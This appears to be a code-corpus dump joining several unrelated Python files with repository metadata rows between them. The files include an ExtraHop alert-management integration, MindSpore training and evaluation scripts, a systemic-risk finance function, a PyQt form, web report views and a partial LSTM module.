data['field_name2'] = field_name2
if demisto.args().get('field_op'):
data['field_op'] = field_op
if demisto.args().get('param'):
data['param'] = param
if demisto.args().get('param2'):
data['param2'] = param2
if alert_id:
method = 'PATCH'
url_suffix = 'alerts/{alert_id}'.format(alert_id=alert_id)
else:
method = 'POST'
url_suffix = 'alerts'
data = json.dumps(data)
try:
res = requests.request(
method,
BASE_URL + url_suffix,
verify=USE_SSL,
data=data,
headers=HEADERS
)
except requests.exceptions.RequestException: # This is the correct syntax
return_error('Failed to connect to - {url} - Please check the URL'.format(url=BASE_URL))
# Handle error responses gracefully
if res.status_code == 204:
return demisto.results('Successful Modification')
if res.status_code == 400:
resp = res.json()
return_error('Error in request format - {message}'.format(message=resp['error_message']))
if res.status_code == 201:
return demisto.results('Alert successfully added')
elif res.status_code not in {200, 204, 201}:
return_error('Error in API call to ExtraHop {code} - {reason}'.format(code=res.status_code, reason=res.reason))
return res
def add_alert_command():
apply_all = bool(strtobool(demisto.args().get('apply_all', False)))
disabled = bool(strtobool(demisto.args().get('disabled', False)))
name = demisto.args().get('name')
notify_snmp = bool(strtobool(demisto.args().get('notify_snmp', False)))
field_name = demisto.args().get('field_name')
stat_name = demisto.args().get('stat_name')
units = demisto.args().get('units')
interval_length = demisto.args().get('interval_length')
operand = demisto.args().get('operand')
refire_interval = demisto.args().get('refire_interval')
severity = demisto.args().get('severity')
alert_type = demisto.args().get('type')
object_type = demisto.args().get('object_type')
protocols = demisto.args().get('protocols')
operator = demisto.args().get('operator')
field_name2 = demisto.args().get('field_name2')
field_op = demisto.args().get('field_op')
param = demisto.args().get('param')
param2 = demisto.args().get('param2')
add_alert(apply_all, disabled, name, notify_snmp, refire_interval, severity, alert_type, object_type,
protocols, field_name, stat_name, units, interval_length, operand, operator, field_name2, field_op,
param, param2)
def modify_alert_command():
alert_id = demisto.args().get('alert_id')
apply_all = bool(strtobool(demisto.args().get('apply_all', False)))
disabled = bool(strtobool(demisto.args().get('disabled', False)))
name = demisto.args().get('name')
notify_snmp = bool(strtobool(demisto.args().get('notify_snmp', False)))
field_name = demisto.args().get('field_name')
stat_name = demisto.args().get('stat_name')
units = demisto.args().get('units')
interval_length = demisto.args().get('interval_length')
operand = demisto.args().get('operand')
refire_interval = demisto.args().get('refire_interval')
severity = demisto.args().get('severity')
alert_type = demisto.args().get('type')
object_type = demisto.args().get('object_type')
protocols = demisto.args().get('protocols')
operator = demisto.args().get('operator')
field_name2 = demisto.args().get('field_name2')
field_op = demisto.args().get('field_op')
param = demisto.args().get('param')
param2 = demisto.args().get('param2')
add_alert(apply_all, disabled, name, notify_snmp, refire_interval, severity, alert_type, object_type,
protocols, field_name, stat_name, units, interval_length, operand, operator, field_name2, field_op,
param, param2, alert_id)
def get_alerts_command():
res = get_alerts()
format_alerts(res)
def whitelist_modify_command():
add = demisto.args().get('add')
remove = demisto.args().get('remove')
whitelist_modify(add, remove)
def query_records_command():
field = demisto.args().get('field')
value = demisto.args().get('value')
operator = demisto.args().get('operator')
query_from = demisto.args().get('query_from')
limit = demisto.args().get('limit')
res = query_records(field, value, operator, query_from, limit)
source = res[0]['records']
hr = ''
ec = {
"ExtraHop": {
"Query": []
}
} # type: dict
for record in source:
hr += tableToMarkdown('Incident result for ID {id}'.format(id=record['_id']), record['_source'])
ec['ExtraHop']['Query'].append(createContext(record, keyTransform=string_to_context_key, removeNull=True))
demisto.results({
'Type': entryTypes['note'],
'ContentsFormat': formats['markdown'],
'Contents': source,
'HumanReadable': hr,
'EntryContext': createContext(ec, removeNull=True)
})
def whitelist_retrieve_command():
res = whitelist_retrieve()
if len(res) == 0:
demisto.results('No devices found in whitelist')
elif len(res) > 0:
format_device_results(res)
def devices_command():
found_devices = devices()
format_device_results(found_devices)
''' COMMANDS MANAGER / SWITCH PANEL '''
LOG('Command being called is {command}'.format(command=demisto.command()))
try:
if demisto.command() == 'test-module':
test_module()
demisto.results('ok')
elif demisto.command() == 'extrahop-get-alert-rules':
get_alerts_command()
elif demisto.command() == 'extrahop-query':
query_records_command()
elif demisto.command() == 'extrahop-devices':
devices_command()
elif demisto.command() == 'extrahop-whitelist-modify':
whitelist_modify_command()
elif demisto.command() == 'extrahop-whitelist-retrieve':
whitelist_retrieve_command()
elif demisto.command() == 'extrahop-add-alert-rule':
add_alert_command()
elif demisto.command() == 'extrahop-modify-alert-rule':
modify_alert_command()
# Log exceptions
except Exception as e:
LOG(str(e))
LOG.print_log()
raise
| 33.608808 | 119 | 0.627303 |
c3102986968c8d96ec77eb7a8b056ee5824f8732
| 6,791 |
py
|
Python
|
research/cv/efficientnet-b0/train.py
|
leelige/mindspore
|
5199e05ba3888963473f2b07da3f7bca5b9ef6dc
|
[
"Apache-2.0"
] | 77 |
2021-10-15T08:32:37.000Z
|
2022-03-30T13:09:11.000Z
|
research/cv/efficientnet-b0/train.py
|
leelige/mindspore
|
5199e05ba3888963473f2b07da3f7bca5b9ef6dc
|
[
"Apache-2.0"
] | 3 |
2021-10-30T14:44:57.000Z
|
2022-02-14T06:57:57.000Z
|
research/cv/efficientnet-b0/train.py
|
leelige/mindspore
|
5199e05ba3888963473f2b07da3f7bca5b9ef6dc
|
[
"Apache-2.0"
] | 24 |
2021-10-15T08:32:45.000Z
|
2022-03-24T18:45:20.000Z
|
# Copyright 2021 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
"""train efficientnet."""
import os
import ast
import argparse
from mindspore import context
from mindspore import Tensor
from mindspore.nn import SGD, RMSProp
from mindspore.context import ParallelMode
from mindspore.train.model import Model
from mindspore.train.callback import ModelCheckpoint, CheckpointConfig
from mindspore.train.serialization import load_checkpoint, load_param_into_net
from mindspore.communication.management import init
from mindspore.train.loss_scale_manager import FixedLossScaleManager
from mindspore.common import dtype as mstype
from mindspore.common import set_seed
from src.lr_generator import get_lr
from src.models.effnet import EfficientNet
from src.config import config
from src.monitor import Monitor
from src.dataset import create_dataset
from src.loss import CrossEntropySmooth
set_seed(1)
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='image classification training')
# modelarts parameter
parser.add_argument('--data_url', type=str, default=None, help='Dataset path')
parser.add_argument('--train_url', type=str, default=None, help='Train output path')
# Ascend parameter
parser.add_argument('--dataset_path', type=str, default=None, help='Dataset path')
parser.add_argument('--run_distribute', type=ast.literal_eval, default=False, help='Run distribute')
parser.add_argument('--device_id', type=int, default=0, help='Device id')
parser.add_argument('--run_modelarts', type=ast.literal_eval, default=False, help='Run mode')
parser.add_argument('--resume', type=str, default='', help='resume training with existed checkpoint')
args_opt = parser.parse_args()
context.set_context(mode=context.GRAPH_MODE, device_target="Ascend", save_graphs=False)
# init distributed
if args_opt.run_modelarts:
import moxing as mox
device_id = int(os.getenv('DEVICE_ID'))
device_num = int(os.getenv('RANK_SIZE'))
context.set_context(device_id=device_id)
local_data_url = '/cache/data'
local_train_url = '/cache/ckpt'
if device_num > 1:
init()
context.set_auto_parallel_context(device_num=device_num, parallel_mode='data_parallel', gradients_mean=True)
local_data_url = os.path.join(local_data_url, str(device_id))
mox.file.copy_parallel(args_opt.data_url, local_data_url)
else:
if args_opt.run_distribute:
device_id = int(os.getenv('DEVICE_ID'))
device_num = int(os.getenv('RANK_SIZE'))
context.set_context(device_id=device_id)
init()
context.reset_auto_parallel_context()
context.set_auto_parallel_context(device_num=device_num,
parallel_mode=ParallelMode.DATA_PARALLEL,
gradients_mean=True)
else:
context.set_context(device_id=args_opt.device_id)
device_num = 1
device_id = 0
# define network
net = EfficientNet(1, 1)
net.to_float(mstype.float16)
# define loss
if not config.use_label_smooth:
config.label_smooth_factor = 0.0
loss = CrossEntropySmooth(smooth_factor=config.label_smooth_factor, num_classes=config.class_num)
# define dataset
if args_opt.run_modelarts:
dataset = create_dataset(dataset_path=local_data_url,
do_train=True,
batch_size=config.batch_size,
device_num=device_num, rank=device_id)
else:
dataset = create_dataset(dataset_path=args_opt.dataset_path,
do_train=True,
batch_size=config.batch_size,
device_num=device_num, rank=device_id)
step_size = dataset.get_dataset_size()
# resume
if args_opt.resume:
ckpt = load_checkpoint(args_opt.resume)
load_param_into_net(net, ckpt)
# get learning rate
loss_scale = FixedLossScaleManager(config.loss_scale, drop_overflow_update=False)
lr = Tensor(get_lr(lr_init=config.lr_init,
lr_end=config.lr_end,
lr_max=config.lr_max,
warmup_epochs=config.warmup_epochs,
total_epochs=config.epoch_size,
steps_per_epoch=step_size,
lr_decay_mode=config.lr_decay_mode))
# define optimization
if config.opt == 'sgd':
optimizer = SGD(net.trainable_params(), learning_rate=lr, momentum=config.momentum,
weight_decay=config.weight_decay, loss_scale=config.loss_scale)
elif config.opt == 'rmsprop':
optimizer = RMSProp(net.trainable_params(), learning_rate=lr, decay=0.9, weight_decay=config.weight_decay,
momentum=config.momentum, epsilon=config.opt_eps, loss_scale=config.loss_scale)
# define model
model = Model(net, loss_fn=loss, optimizer=optimizer, loss_scale_manager=loss_scale,
metrics={'acc'}, amp_level='O3')
# define callbacks
cb = [Monitor(lr_init=lr.asnumpy())]
if config.save_checkpoint and (device_num == 1 or device_id == 0):
config_ck = CheckpointConfig(save_checkpoint_steps=config.save_checkpoint_epochs * step_size,
keep_checkpoint_max=config.keep_checkpoint_max)
if args_opt.run_modelarts:
ckpt_cb = ModelCheckpoint(f"Efficientnet_b0-rank{device_id}", directory=local_train_url, config=config_ck)
else:
save_ckpt_path = os.path.join(config.save_checkpoint_path, 'model_' + str(device_id) + '/')
ckpt_cb = ModelCheckpoint(f"Efficientnet_b0-rank{device_id}", directory=save_ckpt_path, config=config_ck)
cb += [ckpt_cb]
# begine train
model.train(config.epoch_size, dataset, callbacks=cb)
if args_opt.run_modelarts and config.save_checkpoint and (device_num == 1 or device_id == 0):
mox.file.copy_parallel(local_train_url, args_opt.train_url)
| 44.97351 | 120 | 0.674864 |
c332a73bfc6e3ef3ebb75d2e00f603936d77704f
| 3,440 |
py
|
Python
|
analysis/utils.py
|
JasperMorrison/PytorchToCaffe
|
04f0066cdc8a9da92591d7361907c3ea53271707
|
[
"MIT"
] | 794 |
2018-09-06T07:38:41.000Z
|
2022-03-16T06:30:37.000Z
|
analysis/utils.py
|
JasperMorrison/PytorchToCaffe
|
04f0066cdc8a9da92591d7361907c3ea53271707
|
[
"MIT"
] | 111 |
2018-12-04T11:18:27.000Z
|
2022-03-31T07:39:11.000Z
|
analysis/utils.py
|
JasperMorrison/PytorchToCaffe
|
04f0066cdc8a9da92591d7361907c3ea53271707
|
[
"MIT"
] | 221 |
2018-11-22T08:11:03.000Z
|
2022-03-16T07:11:43.000Z
|
import csv,pprint
from .layers import Base
def get_human_readable(num):
units=['','K','M','G','T','P']
idx=0
while .001*num>1:
num=.001*num
idx+=1
if idx>=len(units):
return '%.3e'%num
return '%.3f'%num+units[idx]
def save_csv(layers,csv_save_path='/tmp/analyse.csv',
save_items=('name', 'layer_info', 'input', 'out', 'dot', 'add', 'compare','ops', 'weight_size','activation_size'),
print_detail=True,human_readable=True):
# layers = get_layer_blox_from_blobs(blobs)
print_list = []
sum=[0]*len(save_items)
for layer in layers:
print_line=[]
for idx,param in enumerate(save_items):
item=getattr(layer, param)
if type(item)==list:
s=''
for i in item:
s+=' '+str(i)
else:
s=str(item)
try:
num=int(item)
sum[idx]+=num
except:pass
print_line.append(s)
print_list.append(print_line)
if print_detail:
sum[0] = 'SUM'
print_list.append(sum)
print_table(print_list,save_items)
else:
print_list=[]
for idx,item in enumerate(sum):
if item>0:
if human_readable:
print_list.append('%s:%s' % (save_items[idx], get_human_readable(item)))
else:
print_list.append('%s:%.3e'%(save_items[idx],item))
print(print_list)
if csv_save_path!=None:
with open(csv_save_path,'w') as file:
writer=csv.writer(file)
writer.writerow(save_items)
for layer in print_list:
writer.writerow(layer)
print('saved at {}!'.format(csv_save_path))
def get_layer_blox_from_blobs(blobs):
layers=[]
def creator_search(blob):
for father in blob.father:
if isinstance(father,Base) and father not in layers:
layers.append(father)
if father.muti_input==True:
for input in father.input:
creator_search(input)
else:
creator_search(father.input)
for blob in blobs:
creator_search(blob)
return layers
def print_table(datas,names):
types=[]
for i in datas[0]:
try:
i=int(float(i))
types.append('I')
except:
types.append('S')
for l in datas:
s=''
for i,t in zip(l,types):
if t=='I':
i=int(float(i))
s+=('%.1E'%i).center(10)
else:
i=str(i)
if len(i)>20:
i=i[:17]+'...'
s+=i.center(20)
s+='|'
print(s)
s = ''
for i,t in zip(names,types):
if t == 'I':
s += i.center(10)
else:
if len(i) > 20:
i = i[:17] + '...'
s += i.center(20)
s += '|'
print(s)
def print_by_blob(blobs,print_items=('name', 'layer_info', 'input', 'out', 'dot', 'add', 'compare','ops', 'weight_size','activation_size')):
layers=get_layer_blox_from_blobs(blobs)
print_list = []
for layer in layers:
print_list.append([str(getattr(layer, param)) for param in print_items])
pprint.pprint(print_list, depth=3, width=200)
return print_list
| 30.442478 | 140 | 0.505233 |
c344cbe87e4f07a88247dbd5d8bd50cf1ca23052
| 3,231 |
py
|
Python
|
research/cv/DBPN/eval.py
|
leelige/mindspore
|
5199e05ba3888963473f2b07da3f7bca5b9ef6dc
|
[
"Apache-2.0"
] | 77 |
2021-10-15T08:32:37.000Z
|
2022-03-30T13:09:11.000Z
|
research/cv/DBPN/eval.py
|
leelige/mindspore
|
5199e05ba3888963473f2b07da3f7bca5b9ef6dc
|
[
"Apache-2.0"
] | 3 |
2021-10-30T14:44:57.000Z
|
2022-02-14T06:57:57.000Z
|
research/cv/DBPN/eval.py
|
leelige/mindspore
|
5199e05ba3888963473f2b07da3f7bca5b9ef6dc
|
[
"Apache-2.0"
] | 24 |
2021-10-15T08:32:45.000Z
|
2022-03-24T18:45:20.000Z
|
# Copyright 2021 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
"""DBPN test"""
import argparse
import ast
import time
from mindspore import load_checkpoint, load_param_into_net, context
from src.dataset.dataset import DatasetVal, create_val_dataset
from src.model.generator import get_generator
from src.util.utils import compute_psnr, save_img
parser = argparse.ArgumentParser(description="DBPN eval")
parser.add_argument("--device_id", type=int, default=4, help="device id, default: 0.")
parser.add_argument("--val_GT_path", type=str, default=r'/data/DBPN_data/Set5/HR')
parser.add_argument("--val_LR_path", type=str, default=r'/data/DBPN_data/Set5/LR')
parser.add_argument("--ckpt", type=str, default=r'ckpt/gen/DDBPN_best.ckpt')
parser.add_argument('--upscale_factor', type=int, default=4, choices=[2, 4, 8],
help="Super resolution upscale factor")
parser.add_argument('--model_type', type=str, default='DDBPN', choices=["DBPNS", "DDBPN", "DBPN", "DDBPNL"])
parser.add_argument('--vgg', type=ast.literal_eval, default=True, help="use vgg")
parser.add_argument('--isgan', type=ast.literal_eval, default=False, help="is_gan decides the way of training ")
parser.add_argument('--testBatchSize', type=int, default=1, help='testing batch size')
parser.add_argument('--save_eval_path', type=str, default="./Results/eval", help='save eval image path')
args = parser.parse_args()
print(args)
def predict(ds, model):
"""predict
Args:
ds(Dataset): eval dataset
model(Cell): the generate model
"""
for index, batch in enumerate(ds.create_dict_iterator(), 1):
lr = batch['input_image']
hr = batch['target_image']
t0 = time.time()
prediction = model(lr)
psnr_value = compute_psnr(prediction.squeeze(), hr.squeeze())
t1 = time.time()
print("lr shape", lr.shape)
print("hr shape", hr.shape)
print("prediction shape", prediction.shape)
print("===> Processing: {} compute_psnr:{:.4f}|| Timer: {:.2f} sec.".format(index, psnr_value, (t1 - t0)))
save_img(prediction, str(index), args.save_eval_path)
if __name__ == "__main__":
context.set_context(mode=context.GRAPH_MODE, device_id=args.device_id)
val_dataset = DatasetVal(args.val_GT_path, args.val_LR_path, args)
val_ds = create_val_dataset(val_dataset, args)
print("=======> load model ckpt")
params = load_checkpoint(args.ckpt)
print('===> Building model ', args.model_type)
netG = get_generator(args.model_type, scale_factor=args.upscale_factor)
load_param_into_net(netG, params)
predict(val_ds, netG)
| 43.662162 | 114 | 0.696069 |
c35ff05ae649adfc8d474a5f59af68f95b5a41df
| 5,385 |
py
|
Python
|
frds/measures/func_ses.py
|
mgao6767/wrds
|
7dca2651a181bf38c61ebde675c9f64d6c96f608
|
[
"MIT"
] | 31 |
2020-06-17T13:19:12.000Z
|
2022-03-27T08:56:38.000Z
|
frds/measures/func_ses.py
|
mgao6767/wrds
|
7dca2651a181bf38c61ebde675c9f64d6c96f608
|
[
"MIT"
] | null | null | null |
frds/measures/func_ses.py
|
mgao6767/wrds
|
7dca2651a181bf38c61ebde675c9f64d6c96f608
|
[
"MIT"
] | 8 |
2020-06-14T15:21:51.000Z
|
2021-09-29T06:28:53.000Z
|
import numpy as np
def systemic_expected_shortfall(
mes_training_sample: np.ndarray,
lvg_training_sample: np.ndarray,
ses_training_sample: np.ndarray,
mes_firm: float,
lvg_firm: float,
) -> float:
r"""Systemic Expected Shortfall (SES)
A measure of a financial institution's contribution to a systemic crisis by
[Acharya, Pedersen, Philippon, and Richardson (2017)](https://doi.org/10.1093/rfs/hhw088), which equals to
the expected amount a bank is undercapitalized in a future systemic event in which the overall financial system is undercapitalized.
SES increases in the bank’s expected losses during a crisis, and is related to the bank's
[marginal expected shortfall (MES)](/measures/marginal_expected_shortfall/),
i.e., its losses in the tail of the aggregate sector’s loss distribution, and leverage.
SES is a theoretical construct and the authors use the following 3 measures to proxy it:
1. The outcome of stress tests performed by regulators. The SES metric of a firm here is defined as the recommended capital that
it was required to raise as a result of the stress test in February 2009.
2. The decline in equity valuations of large financial firms during the crisis, as measured by their cumulative equity return
from July 2007 to December 2008.
3. The widening of the credit default swap spreads of large financial firms as measured by their cumulative CDS spread increases
from July 2007 to December 2008.
Given these proxies, the authors seek to develop leading indicators which “predict” an institution’s SES, including
marginal expected shortfall (MES) and leverage (LVG).
!!! note
Since SES is a theoretical construct, this function estimates the **fitted SES** following Bisias, Flood, Lo, and Valavanis (2012).
Specifically, the following model is estimated:
$$
\textit{realized SES}_{i,\textit{crisis}} = a + b MES_{i,\textit{pre-crisis}} + c LVG_{i,\textit{pre-crisis}} + \varepsilon_{i}
$$
where $\textit{realized SES}_{i,\textit{crisis}}$ is the stock return during the crisis, and $LVG_{i,\textit{pre-crisis}}$ is
defined as $(\text{book assets - book equity + market equity}) / \text{market equity}$.
The fitted SES is computed as
$$
\textit{fitted SES} = \frac{b}{b+c} MES + \frac{c}{b+c} LVG
$$
??? note "Model in Acharya, Pedersen, Philippon, and Richardson (2017)"
In Acharya, Pedersen, Philippon, and Richardson (2017), fitted SES is abtained via estimating the model:
$$
\textit{realized SES}_{i,\textit{crisis}} = a + b MES_{i,\textit{pre-crisis}} + c LVG_{i,\textit{pre-crisis}} + \text{industriy dummies} + \varepsilon_{i}
$$
and calculating the fitted value of $\textit{realized SES}_{i}$ directly, where
the industry dummies inlcude indicators for whether the bank is a broker-dealer, an insurance company and other.
See Model 6 in Table 4 (p.23) and Appendix C.
Args:
mes_training_sample (np.ndarray): (n_firms,) array of firm ex ante MES.
lvg_training_sample (np.ndarray): (n_firms,) array of firm ex ante LVG (say, on the last day of the period of training data)
ses_training_sample (np.ndarray): (n_firms,) array of firm ex post cumulative return for date range after `lvg_training_sample`.
mes_firm (float): The current firm MES used to calculate the firm (fitted) SES value.
lvg_firm (float): The current firm leverage used to calculate the firm (fitted) SES value.
Returns:
float: The systemic risk that firm $i$ poses to the system at a future time.
Examples:
>>> from frds.measures import systemic_expected_shortfall
>>> import numpy as np
>>> mes_training_sample = np.array([-0.023, -0.07, 0.01])
>>> lvg_training_sample = np.array([1.8, 1.5, 2.2])
>>> ses_training_sample = np.array([0.3, 0.4, -0.2])
>>> mes_firm = 0.04
>>> lvg_firm = 1.7
>>> systemic_expected_shortfall(mes_training_sample, lvg_training_sample, ses_training_sample, mes_firm, lvg_firm)
-0.33340757238306845
References:
* [Acharya, Pedersen, Philippon, and Richardson (2017)](https://doi.org/10.1093/rfs/hhw088),
Measuring systemic risk, *The Review of Financial Studies*, 30, (1), 2-47.
* [Bisias, Flood, Lo, and Valavanis (2012)](https://doi.org/10.1146/annurev-financial-110311-101754),
A survey of systemic risk analytics, *Annual Review of Financial Economics*, 4, 255-296.
See Also:
Systemic risk measures:
* [Absorption Ratio](/measures/absorption_ratio/)
* [Contingent Claim Analysis](/measures/cca/)
* [Distress Insurance Premium](/measures/distress_insurance_premium/)
* [Marginal Expected Shortfall (MES)](/measures/marginal_expected_shortfall/)
"""
assert mes_training_sample.shape == lvg_training_sample.shape
assert mes_training_sample.shape == ses_training_sample.shape
n_firms = mes_training_sample.shape
data = np.vstack([np.ones(n_firms), mes_training_sample, lvg_training_sample]).T
betas = np.linalg.lstsq(data, ses_training_sample, rcond=None)[0]
_, b, c = betas
ses = (b * mes_firm + c * lvg_firm) / (b + c)
return ses
| 49.861111 | 162 | 0.689322 |
5b07aa8c7b630fc27e0d846cd78d21e4d0b33230
| 798 |
py
|
Python
|
BtmManager-Prototyp-py/Gui_ui/test.py
|
datend3nker/JuFo-BtM
|
a01e931ec4862c12e8a4861eed0661806ee2d19e
|
[
"BSD-Source-Code"
] | null | null | null |
BtmManager-Prototyp-py/Gui_ui/test.py
|
datend3nker/JuFo-BtM
|
a01e931ec4862c12e8a4861eed0661806ee2d19e
|
[
"BSD-Source-Code"
] | null | null | null |
BtmManager-Prototyp-py/Gui_ui/test.py
|
datend3nker/JuFo-BtM
|
a01e931ec4862c12e8a4861eed0661806ee2d19e
|
[
"BSD-Source-Code"
] | null | null | null |
# -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'test.ui'
#
# Created by: PyQt5 UI code generator 5.13.2
#
# WARNING! All changes made in this file will be lost!
from PyQt5 import QtCore, QtGui, QtWidgets
class Ui_Form(object):
def setupUi(self, Form):
Form.setObjectName("Form")
Form.resize(400, 300)
self.label = QtWidgets.QLabel(Form)
self.label.setGeometry(QtCore.QRect(160, 150, 47, 13))
self.label.setObjectName("label")
self.retranslateUi(Form)
QtCore.QMetaObject.connectSlotsByName(Form)
def retranslateUi(self, Form):
_translate = QtCore.QCoreApplication.translate
Form.setWindowTitle(_translate("Form", "Form"))
self.label.setText(_translate("Form", "test only"))
| 28.5 | 62 | 0.672932 |
82d3741631b32b5825f7e8be517a88780626b771
| 786 |
py
|
Python
|
tarefas-poo/lista-02/processa-numeros/view/paineis/painel_primeiro_e_ultimo.py
|
victoriaduarte/POO_UFSC
|
0c65b4f26383d1e3038d8469bd91fd2c0cb98c1a
|
[
"MIT"
] | null | null | null |
tarefas-poo/lista-02/processa-numeros/view/paineis/painel_primeiro_e_ultimo.py
|
victoriaduarte/POO_UFSC
|
0c65b4f26383d1e3038d8469bd91fd2c0cb98c1a
|
[
"MIT"
] | null | null | null |
tarefas-poo/lista-02/processa-numeros/view/paineis/painel_primeiro_e_ultimo.py
|
victoriaduarte/POO_UFSC
|
0c65b4f26383d1e3038d8469bd91fd2c0cb98c1a
|
[
"MIT"
] | null | null | null |
# --------------------------
# UFSC - CTC - INE - INE5603
# Exercício Processa Números
# --------------------------
# Classe responsável por encontrar o primeiro e o último número.
from view.paineis.painel_abstrato import PainelAbstrato
from model.processa_numeros import primeiro_e_ultimo
class PainelPrimeiroEUltimo(PainelAbstrato):
def __init__(self):
super().__init__('Primeiro e Último')
def interaja(self):
numeros = self._leiaints()
resposta = primeiro_e_ultimo(numeros)
if resposta is None:
msg = 'Não dá para encontrar porque a lista {} tem menos de 2 números'.format(numeros)
else:
msg = 'Para a lista {} o primeiro é o {} e último é o {}'.format(numeros, resposta[0], resposta[1])
print(msg)
| 35.727273 | 111 | 0.632316 |
7d87dfad7a60725b9a20577262f40d0821fdc251
| 2,348 |
py
|
Python
|
src/onegov/wtfs/views/report.py
|
politbuero-kampagnen/onegov-cloud
|
20148bf321b71f617b64376fe7249b2b9b9c4aa9
|
[
"MIT"
] | null | null | null |
src/onegov/wtfs/views/report.py
|
politbuero-kampagnen/onegov-cloud
|
20148bf321b71f617b64376fe7249b2b9b9c4aa9
|
[
"MIT"
] | null | null | null |
src/onegov/wtfs/views/report.py
|
politbuero-kampagnen/onegov-cloud
|
20148bf321b71f617b64376fe7249b2b9b9c4aa9
|
[
"MIT"
] | null | null | null |
from morepath import redirect
from onegov.wtfs import _
from onegov.wtfs import WtfsApp
from onegov.wtfs.forms import ReportSelectionForm
from onegov.wtfs.layouts import ReportBoxesAndFormsByDeliveryLayout
from onegov.wtfs.layouts import ReportBoxesAndFormsLayout
from onegov.wtfs.layouts import ReportBoxesLayout
from onegov.wtfs.layouts import ReportFormsAllMunicipalitiesLayout
from onegov.wtfs.layouts import ReportFormsByMunicipalityLayout
from onegov.wtfs.layouts import ReportLayout
from onegov.wtfs.models import Report
from onegov.wtfs.models import ReportBoxes
from onegov.wtfs.models import ReportBoxesAndForms
from onegov.wtfs.models import ReportBoxesAndFormsByDelivery
from onegov.wtfs.models import ReportFormsAllMunicipalities
from onegov.wtfs.models import ReportFormsByMunicipality
from onegov.wtfs.security import ViewModel
@WtfsApp.form(
model=Report,
template='form.pt',
permission=ViewModel,
form=ReportSelectionForm
)
def view_select_report(self, request, form):
layout = ReportLayout(self, request)
if form.submitted(request):
return redirect(request.link(form.get_model()))
return {
'layout': layout,
'form': form,
'button_text': _("Show")
}
@WtfsApp.html(
model=ReportBoxes,
template='report_boxes.pt',
permission=ViewModel
)
def view_report_boxes(self, request):
return {'layout': ReportBoxesLayout(self, request)}
@WtfsApp.html(
model=ReportBoxesAndForms,
template='report_boxes_and_forms.pt',
permission=ViewModel
)
def view_report_boxes_and_forms(self, request):
return {'layout': ReportBoxesAndFormsLayout(self, request)}
@WtfsApp.html(
model=ReportFormsByMunicipality,
template='report_forms.pt',
permission=ViewModel
)
def view_report_forms(self, request):
return {'layout': ReportFormsByMunicipalityLayout(self, request)}
@WtfsApp.html(
model=ReportFormsAllMunicipalities,
template='report_forms_all.pt',
permission=ViewModel
)
def view_report_forms_all(self, request):
return {'layout': ReportFormsAllMunicipalitiesLayout(self, request)}
@WtfsApp.html(
model=ReportBoxesAndFormsByDelivery,
template='report_delivery.pt',
permission=ViewModel
)
def view_report_delivery(self, request):
return {'layout': ReportBoxesAndFormsByDeliveryLayout(self, request)}
| 28.634146 | 73 | 0.780664 |
6fab860de2198ce95ff7b6720e5453e4f81f5807
| 12,488 |
py
|
Python
|
research/nlp/atae_lstm/src/model_utils/rnns.py
|
leelige/mindspore
|
5199e05ba3888963473f2b07da3f7bca5b9ef6dc
|
[
"Apache-2.0"
] | 77 |
2021-10-15T08:32:37.000Z
|
2022-03-30T13:09:11.000Z
|
research/nlp/atae_lstm/src/model_utils/rnns.py
|
leelige/mindspore
|
5199e05ba3888963473f2b07da3f7bca5b9ef6dc
|
[
"Apache-2.0"
] | 3 |
2021-10-30T14:44:57.000Z
|
2022-02-14T06:57:57.000Z
|
research/nlp/atae_lstm/src/model_utils/rnns.py
|
leelige/mindspore
|
5199e05ba3888963473f2b07da3f7bca5b9ef6dc
|
[
"Apache-2.0"
] | 24 |
2021-10-15T08:32:45.000Z
|
2022-03-24T18:45:20.000Z
|
# Copyright 2021 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
"""LSTM"""
import math
import numpy as np
import mindspore
from mindspore import nn, Tensor, Parameter, ParameterTuple, ops as P
from mindspore import log as logger
from mindspore import context
from mindspore.ops.primitive import constexpr
from src.model_utils.my_utils import Reverse, ReverseSequence
from src.model_utils.rnn_cells import rnn_relu_cell, rnn_tanh_cell, lstm_cell, gru_cell
@constexpr
def _init_state(shape, dtype, is_lstm):
hx = Tensor(np.zeros(shape), dtype)
cx = Tensor(np.zeros(shape), dtype)
if is_lstm:
res = [hx, cx]
else:
res = hx
return res
class DynamicRNN(nn.Cell):
"""DynamicRNN"""
def __init__(self, mode):
super(DynamicRNN, self).__init__()
if mode == "RNN_RELU":
cell = rnn_relu_cell
elif mode == "RNN_TANH":
cell = rnn_tanh_cell
elif mode == "LSTM":
cell = lstm_cell
elif mode == "GRU":
cell = gru_cell
else:
raise ValueError("Unrecognized RNN mode: " + mode)
self.cell = cell
self.is_lstm = mode == "LSTM"
self.squeeze_0 = P.Squeeze(0)
def recurrent(self, x, h_0, w_ih, w_hh, b_ih, b_hh):
"""Fixed seq length"""
time_step = x.shape[0]
outputs = []
t = 0
h = h_0
while t < time_step:
h = self.cell(x[t], h, w_ih, w_hh, b_ih, b_hh)
if self.is_lstm:
outputs.append(h[0])
else:
outputs.append(h)
t += 1
outputs = P.Stack()(outputs)
return outputs, h
def variable_recurrent(self, x, h, seq_length, w_ih, w_hh, b_ih, b_hh):
"""variable seq length"""
time_step = x.shape[0]
h_t = h
if self.is_lstm:
hidden_size = h[0].shape[-1]
zero_output = P.ZerosLike()(h_t[0])
else:
